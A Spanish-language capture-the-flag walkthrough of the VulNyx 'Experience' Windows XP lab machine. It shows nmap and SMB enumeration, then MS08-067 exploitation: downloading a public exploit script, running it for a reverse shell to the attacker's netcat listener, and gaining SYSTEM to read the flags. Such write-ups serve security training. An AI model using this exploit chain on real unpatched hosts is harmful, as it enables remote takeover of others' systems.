VulNyx - Experience

Information

Experience es una máquina virtual vulnerable Windows de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en el hipervisor VirtualBox.

---

Enumeration

Nmap

TCP

❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.139
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 10:41 CEST
Nmap scan report for 192.168.1.139
Host is up (0.00016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

❯ nmap -sVC -p135,139,445 192.168.1.139
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 10:42 CEST
Nmap scan report for 192.168.1.139
Host is up (0.00081s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
MAC Address: 08:00:27:9A:D1:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 13h29m57s, deviation: 4h56m59s, median: 9h59m57s
|_nbstat: NetBIOS name: EXPERIENCE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:9a:d1:bd (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: experience
|   NetBIOS computer name: EXPERIENCE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-06-03T11:43:00-07:00

---

Shell (NT AUTHORITY\SYSTEM)

445/TCP (SMB)

Basic Enumeration

❯ netexec smb 192.168.1.139
SMB   192.168.1.139   445   EXPERIENCE   [*] Windows 5.1 x32 (name:EXPERIENCE) (domain:experience) (signing:False) (SMBv1:True)

Shares

Null Session

❯ smbclient -NL //192.168.1.139
session setup failed: NT_STATUS_INVALID_PARAMETER

❯ smbmap --no-banner -H 192.168.1.139 -u '' -p ''
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[!] Access denied on 192.168.1.139, no fun for you...
[*] Closed 1 connections

❯ netexec smb 192.168.1.139 -u '' -p '' --shares
SMB         192.168.1.139   445    EXPERIENCE       [*] Windows 5.1 x32 (name:EXPERIENCE) (domain:experience) (signing:False) (SMBv1:True)
SMB         192.168.1.139   445    EXPERIENCE       [+] experience\: 
SMB         192.168.1.139   445    EXPERIENCE       [-] Error enumerating shares: STATUS_ACCESS_DENIED

RPC

Null Session

❯ rpcclient -NU "" 192.168.1.139 -c "srvinfo"
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

MS08-067 (CVE-2008-4250)

Check

❯ nmap -p445 --script="smb-vuln*" 192.168.1.139
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 10:47 CEST
Nmap scan report for 192.168.1.139
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:9A:D1:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

Reverse Shell

Uso el siguiente exploit para intentar obtener una reverse shell

❯ wget -q "https://gist.githubusercontent.com/jrmdev/5881544269408edde11335ea2b5438de/raw/000546fe015a92e7837d4a82def7c90020d39b08/ms08-067.py"
❯ python3 ms08-067.py 192.168.1.139 6 445 192.168.1.5 443
                                                                                       
		@@@@@@@@@@    @@@@@@    @@@@@@@@    @@@@@@              @@@@@@@@     @@@@@@  @@@@@@@@  
		@@@@@@@@@@@  @@@@@@@   @@@@@@@@@@  @@@@@@@@            @@@@@@@@@@   @@@@@@@  @@@@@@@@  
		@@! @@! @@!  !@@       @@!   @@@@  @@!  @@@            @@!   @@@@  !@@            @@!  
		!@! !@! !@!  !@!       !@!  @!@!@  !@!  @!@            !@!  @!@!@  !@!           !@!   
		@!! !!@ @!@  !!@@!!    @!@ @! !@!   !@!!@!  @!@!@!@!@  @!@ @! !@!  !!@@!@!      @!!    
		!@!   ! !@!   !!@!!!   !@!!!  !!!   !!@!!!  !!!@!@!!!  !@!!!  !!!  @!!@!!!!    !!!     
		!!:     !!:       !:!  !!:!   !!!  !!:  !!!            !!:!   !!!  !:!  !:!   !!:      
		:!:     :!:      !:!   :!:    !:!  :!:  !:!            :!:    !:!  :!:  !:!  :!:       
		:::     ::   :::: ::   ::::::: ::  ::::: ::            ::::::: ::  :::: :::   ::       
		:      :    :: : :     : : :  :    : :  :              : : :  :    :: : :   : :       
																							  
		
Windows XP SP3 English (NX)

[+] Generating shellcode ...
[+] Initiating connection ...
[+] Connected to ncacn_np:192.168.1.139[\pipe\browser]
[+] Please start a netcat listener: nc -lvp 443, press enter to continue ...

Obtengo la shell pero no puedo verificar el usuario actual ya que no existe el binario whoami

❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.139] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

Al consultar la variable de entorno %USERNAME% tampoco muestra el usuario, cargo el binario whoami.exe desde mi máquina local y confirmo que soy el usuario NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>echo %USERNAME%
%USERNAME%

❯ find / -name whoami.exe 2>/dev/null
/usr/share/windows-resources/binaries/whoami.exe
❯ cp /usr/share/windows-resources/binaries/whoami.exe .
❯ impacket-smbserver a . -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

C:\WINDOWS\system32>\\192.168.1.5\a\whoami.exe
NT AUTHORITY\SYSTEM

Flags

Ya como usuario NT AUTHORITY\SYSTEM puedo leer las flags user.txt y root.txt

C:\>type c:\"Documents and Settings"\bill\Desktop\user.txt
f9e2****************************
C:\>type c:\"Documents and Settings"\bill\Desktop\root.txt
type c:\"Documents and Settings"\bill\Desktop\root.txt
c1d5**************************** 

Hasta aquí la resolución de la máquina Experience.

Happy Hacking!